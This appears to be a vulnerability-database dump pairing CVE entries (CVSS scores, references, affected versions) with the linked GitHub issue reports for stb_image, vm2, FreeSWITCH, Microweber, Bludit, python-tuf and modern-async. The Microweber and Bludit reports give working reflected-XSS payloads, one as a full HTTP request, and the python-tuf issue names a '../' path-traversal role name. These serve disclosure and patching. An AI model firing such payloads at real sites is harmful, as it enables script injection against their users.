heap overflow by a craft jpeg file in stb_image.h:2099 poc [poc_hoob.zip](https://github.com/nothings/stb/files/6082734/poc_hoob.zip) asan report: ``` ==42271==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000559f20 at pc 0x00000051a2dd bp 0x7ffd06a9e900 sp 0x7ffd06a9e8f8 READ of size 4 at 0x000000559f20 thread T0 #0 0x51a2dc in stbi__extend_receive /home/kaka/fuzz/stb/tests/./../stb_image.h:2099:16 #1 0x518400 in stbi__jpeg_decode_block /home/kaka/fuzz/stb/tests/./../stb_image.h:2154:15 #2 0x517173 in stbi__parse_entropy_coded_data /home/kaka/fuzz/stb/tests/./../stb_image.h:2920:30 #3 0x5138d0 in stbi__decode_jpeg_image /home/kaka/fuzz/stb/tests/./../stb_image.h:3321:15 #4 0x510a21 in load_jpeg_image /home/kaka/fuzz/stb/tests/./../stb_image.h:3773:9 #5 0x4fe7b1 in stbi__jpeg_load /home/kaka/fuzz/stb/tests/./../stb_image.h:3930:13 #6 0x4f8b3f in stbi__load_and_postprocess_8bit /home/kaka/fuzz/stb/tests/./../stb_image.h:1203:19 #7 0x4f9d12 in stbi_load_from_memory /home/kaka/fuzz/stb/tests/./../stb_image.h:1373:11 #8 0x4fd734 in LLVMFuzzerTestOneInput /home/kaka/fuzz/stb/tests/stbi_read_fuzzer.c:19:26 #9 0x4f84fd in main /home/kaka/fuzz/stb/tests/fuzz_main.c:48:11 #10 0x7fd09b4ea83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x41b038 in _start (/home/kaka/fuzz/stb/tests/image_fuzzer+0x41b038) 0x000000559f20 is located 32 bytes to the left of global variable '<string literal>' defined in './../stb_image.h:2198:33' (0x559f40) of size 22 '<string literal>' is ascii string 'can't merge dc and ac' 0x000000559f20 is located 0 bytes to the right of global variable 'stbi__jbias' defined in './../stb_image.h:2083:18' (0x559ee0) of size 64 SUMMARY: AddressSanitizer: global-buffer-overflow /home/kaka/fuzz/stb/tests/./../stb_image.h:2099:16 in stbi__extend_receive Shadow bytes around the buggy address: 0x0000800a3390: 00 04 f9 f9 f9 f9 f9 f9 00 04 f9 f9 f9 f9 f9 f9 0x0000800a33a0: 00 f9 f9 f9 f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9 0x0000800a33b0: 00 00 00 00 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 0x0000800a33c0: 00 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 0x0000800a33d0: 00 00 00 00 00 00 00 02 f9 f9 f9 f9 00 00 00 00 =>0x0000800a33e0: 00 00 00 00[f9]f9 f9 f9 00 00 06 f9 f9 f9 f9 f9 0x0000800a33f0: 00 04 f9 f9 f9 f9 f9 f9 00 00 05 f9 f9 f9 f9 f9 0x0000800a3400: 00 06 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9 0x0000800a3410: 00 00 04 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 0x0000800a3420: 00 00 f9 f9 f9 f9 f9 f9 00 00 02 f9 f9 f9 f9 f9 0x0000800a3430: 00 00 05 f9 f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==42271==ABORTING ```
heap overflow in stb_image.h:2099
https://api.github.com/repos/nothings/stb/issues/1108/comments
2
2021-03-04T10:19:50Z
2021-10-15T01:45:27Z
https://github.com/nothings/stb/issues/1108
821,985,137
1,108
2,703
CVE-2021-23449
2021-10-18T17:15:07.790
This affects the package vm2 before 3.9.4 via a Prototype Pollution attack vector, which can lead to execution of arbitrary code on the host machine.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/363" }, { "source": "report@snyk.io", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/releases/tag/3.9.4" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211029-0010/" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-VM2-1585918" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/commit/b4f6e2bd2c4a1ef52fc4483d8e35f28bc4481886" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/issues/363" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/patriksimek/vm2/releases/tag/3.9.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211029-0010/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-VM2-1585918" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "22C0E167-6242-41C5-9937-A435AE42AD3E", "versionEndExcluding": "3.9.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/patriksimek/vm2/issues/363
[ "Third Party Advisory" ]
github.com
[ "patriksimek", "vm2" ]
Hi, I would like to report a sandbox breakout, but I believe this should be done in a responsible, private way. Please create a security policy and an advisory, as instructed here: https://github.com/patriksimek/vm2/issues/338
Sandbox breakout
https://api.github.com/repos/patriksimek/vm2/issues/363/comments
4
2021-09-07T09:20:16Z
2021-10-15T23:01:08Z
https://github.com/patriksimek/vm2/issues/363
989,776,033
363
2,704
CVE-2021-36513
2021-10-18T17:15:07.913
An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/signalwire/freeswitch/issues/1245" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://newreleases.io/project/github/signalwire/freeswitch/release/v1.10.6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/signalwire/freeswitch/issues/1245" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://newreleases.io/project/github/signalwire/freeswitch/release/v1.10.6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:signalwire:freeswitch:*:*:*:*:*:*:*:*", "matchCriteriaId": "82B8B23B-0388-4427-BF92-059D8573DC7F", "versionEndExcluding": "1.10.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "909" ]
909
https://github.com/signalwire/freeswitch/issues/1245
[ "Exploit", "Third Party Advisory" ]
github.com
[ "signalwire", "freeswitch" ]
There are a few uninitialized value use bugs in src/mode/endpoints/mod_sofia/sofia.c In function sofia_handle_sip_i_notify(): Array network_ip will be allocated in line 859 ``` 857 if (sofia_test_pflag(profile, PFLAG_FORWARD_MWI_NOTIFY)) { 858 const char *mwi_status = NULL; 859 char network_ip[80]; ``` Then, it will be initialized by sofi_glue_get_addr() 867 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), NULL); 868 for (x = 0; x < profile->acl_count; x++) { 869 last_acl = profile->acl[x]; 870 if (!(acl_ok = switch_check_network_list_ip(network_ip, last_acl))) { 871 break; However, sofi_glue_get_addr() may return earlier, leading network_ip in an uninitliazed state. Then network_ip will be used in switch_check_network_list_ip(). It may bypass (ACL) security checks due to the uninitialized value of network_ip, leading to privilege escalation. Same in: ``` 1618 if (authorization) { 1619 char network_ip[80]; 1620 int network_port; 1621 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port); 1622 auth_res = sofia_reg_parse_auth(profile, authorization, sip, de, 1623 (char *) sip->sip_request->rq_method_name, tech_pvt->key, strlen(tech_pvt->key), network_ip, network_port, NULL, 0, 1624 REG_INVITE, NULL, NULL, NULL, NULL); 1625 } ``` and in function sofia_handle_sip_i_reinvite() ``` 10195 char network_ip[80]; 10196 int network_port = 0; 10197 char via_space[2048]; 10198 char branch[16] = ""; 10199 10200 sofia_glue_store_session_id(session, profile, sip, 0); 10201 10202 sofia_clear_flag(tech_pvt, TFLAG_GOT_ACK); 10203 10204 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port); 10205 switch_stun_random_string(branch, sizeof(branch) - 1, "0123456789abcdef"); 10206 10207 switch_snprintf(via_space, sizeof(via_space), "SIP/2.0/UDP %s;rport=%d;branch=%s", network_ip, network_port, branch); ``` and in function sofia_handle_sip_i_invite() ``` 10311 char network_ip[80]; .... 10394 sofia_glue_get_addr(de->data->e_msg, network_ip, sizeof(network_ip), &network_port); 10395 10396 switch_log_printf(SWITCH_CHANNEL_SESSION_LOG(tech_pvt->session), SWITCH_LOG_INFO, "%s receiving invite from %s:%d version: %s call-id: %s\n", 10397 switch_channel_get_name(tech_pvt->channel), network_ip, network_port, switch_version_full_human(), sip->sip_call_id ? switch_str_nil(sip->sip_call_id->i_id) : ""); 10398 ``` sofi_glue_get_addr() may return earlier, leading network_ip in an uninitialized state. Then network_ip will be used in function switch_log_printf(). This function may print out sensitive data that network_ip contained from previous stack. Fix: set network_ip[80] = " ", preventing from uninitlized value use. Thank you for the review, I also report this bug to CVE.
Usage-of-uninitialized value
https://api.github.com/repos/signalwire/freeswitch/issues/1245/comments
3
2021-06-29T23:15:58Z
2021-07-24T19:40:41Z
https://github.com/signalwire/freeswitch/issues/1245
933,172,641
1,245
2,705
CVE-2021-33988
2021-10-19T17:15:07.107
Cross Site Scripting (XSS). vulnerability exists in Microweber CMS 1.2.7 via the Login form, which could let a malicious user execute Javascript by Inserting code in the request form.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nck0099/osTicket/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/nck0099/osTicket/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:microweber:microweber:1.2.7:*:*:*:*:*:*:*", "matchCriteriaId": "93BB666C-22D1-42FB-B091-2C13141D4F64", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/nck0099/osTicket/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "nck0099", "osTicket" ]
**Microweber Reflected XSS** **Vuln Description:** _Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts._ **Impact: High** _The impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data._ **POC:** Identified un-Authenticated XSS on microweber CMS Version =< 1.2.7. 1.Post request is modified to insert XSS payload ![image](https://user-images.githubusercontent.com/15015160/119272806-84a2b680-bc25-11eb-8bca-2091220bd900.png) 2. XSS payload inserted in has been executed as shown in the snapshot. ![image](https://user-images.githubusercontent.com/15015160/119272824-98e6b380-bc25-11eb-84d4-fe53ded73753.png) **Request:** `POST /latest/module/ HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.0.10/latest Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 97 Host: 192.168.0.10 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive _confirm=1&captcha_parent_for_id=footer_newsletter&module='"()&%<acx><ScRiPt>alert(9803)</ScRiPt>` Response: `HTTP/1.1 200 OK Date: Sun, 23 May 2021 18:43:25 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 X-Powered-By: PHP/7.3.27 Cache-Control: no-cache, private Set-Cookie: laravel_session=sZd2dncQHiqTHHF4nViZLVDVDEjgSQOk0XiKvxi9; expires=Sun, 23-May-2021 20:43:26 GMT; Max-Age=7200; path=/; httponly Content-Length: 128 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <tag>mw_replace_back_this_module_1163675171-parser_modules227517859110</tag><ScRiPt>alert(9803)</ScRiPt>`
Microweber CMS(1.2.7) Reflected XSS
https://api.github.com/repos/nck0099/osTicket/issues/2/comments
1
2021-05-23T18:49:14Z
2021-10-27T08:11:24Z
https://github.com/nck0099/osTicket/issues/2
899,083,420
2
2,706
CVE-2021-35323
2021-10-19T18:15:07.920
Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/164990/Bludit-3.13.1-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1327" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/164990/Bludit-3.13.1-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/bludit/bludit/issues/1327" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*", "matchCriteriaId": "2073F4B1-16F9-491D-A54E-5A1CBE9ED6F7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/bludit/bludit/issues/1327
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "bludit", "bludit" ]
### Describe your problem I found a cross-site scripting attack on the login page http://localhost:800/admin/login cross-site scripting is a vulnerability that allows an attacker to send malicious code(usually in javascript form) to another user Because a browser cannot know if the script should be trusted or not, it will execute the script in user context allowing the attacker to access any cookies or sessions tokens retained by the browser. ### Steps to reproduce the problem 1. open login page http://localhost:800/admin/login; 2. enter the username place ``admin"><img src=x onerror=alert(1)>`` and enter password 3. trigger the malicious javascript code ### Bludit version bludit-3-13-1 ### PHP version PHP 7.4.15
cross site script (xss)
https://api.github.com/repos/bludit/bludit/issues/1327/comments
4
2021-05-27T17:35:01Z
2021-11-15T03:15:38Z
https://github.com/bludit/bludit/issues/1327
904,020,030
1,327
2,707
CVE-2021-41131
2021-10-19T18:15:07.967
python-tuf is a Python reference implementation of The Update Framework (TUF). In both clients (`tuf/client` and `tuf/ngclient`), there is a path traversal vulnerability that in the worst case can overwrite files ending in `.json` anywhere on the client system on a call to `get_one_valid_targetinfo()`. It occurs because the rolename is used to form the filename, and may contain path traversal characters (ie `../../name.json`). The impact is mitigated by a few facts: It only affects implementations that allow arbitrary rolename selection for delegated targets metadata, The attack requires the ability to A) insert new metadata for the path-traversing role and B) get the role delegated by an existing targets metadata, The written file content is heavily restricted since it needs to be a valid, signed targets file. The file extension is always .json. A fix is available in version 0.19 or newer. There are no workarounds that do not require code changes. Clients can restrict the allowed character set for rolenames, or they can store metadata in files named in a way that is not vulnerable: neither of these approaches is possible without modifying python-tuf.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 8.8, "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 9.2, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 4.7, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.7, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.8, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/issues/1527" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/commit/4ad7ae48fda594b640139c3b7eae21ed5155a102" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/issues/1527" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:the_update_framework:*:*:*:*:*:python:*:*", "matchCriteriaId": "6F0BDA96-F4FA-4C50-904E-56E5E3BE4B13", "versionEndExcluding": null, "versionEndIncluding": "0.18.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/theupdateframework/python-tuf/issues/1527
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "theupdateframework", "python-tuf" ]
**Description of issue or feature request**: Delegation role names are not restricted in any way in the spec, but they are targets metadata role names. They could be `"."`, `"../../filename"` or `1.role`. The problem is that at some point those delegation role names are used when constructing an URL used to download the delegated target metadata file: https://github.com/theupdateframework/tuf/blob/e9106b59cdb5bbfb4260c5ffc3144e79f8f9596a/tuf/ngclient/updater.py#L287 which is likely to be a problem. **Current behavior**: No validation is used for Delegation role names. **Expected behavior**: Escape special symbols like `.` or `\`.
Metadata API: Delegation role names validation
https://api.github.com/repos/theupdateframework/python-tuf/issues/1527/comments
15
2021-08-20T18:14:23Z
2021-11-18T08:56:52Z
https://github.com/theupdateframework/python-tuf/issues/1527
975,822,427
1,527
2,708
CVE-2021-41167
2021-10-20T19:15:07.570
modern-async is an open source JavaScript tooling library for asynchronous operations using async/await and promises. In affected versions a bug affecting two of the functions in this library: forEachSeries and forEachLimit. They should limit the concurrency of some actions but, in practice, they don't. Any code calling these functions will be written thinking they would limit the concurrency but they won't. This could lead to potential security issues in other projects. The problem has been patched in 1.0.4. There is no workaround.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/issues/5" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/commit/0010d28de1b15d51db3976080e26357fa7144436" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/nicolas-van/modern-async/security/advisories/GHSA-3pcq-34w5-p4g2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modern-async_project:modern-async:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "8342CAB0-7958-4083-BFBE-643DDB7E9E2A", "versionEndExcluding": "1.0.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/nicolas-van/modern-async/issues/5
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nicolas-van", "modern-async" ]
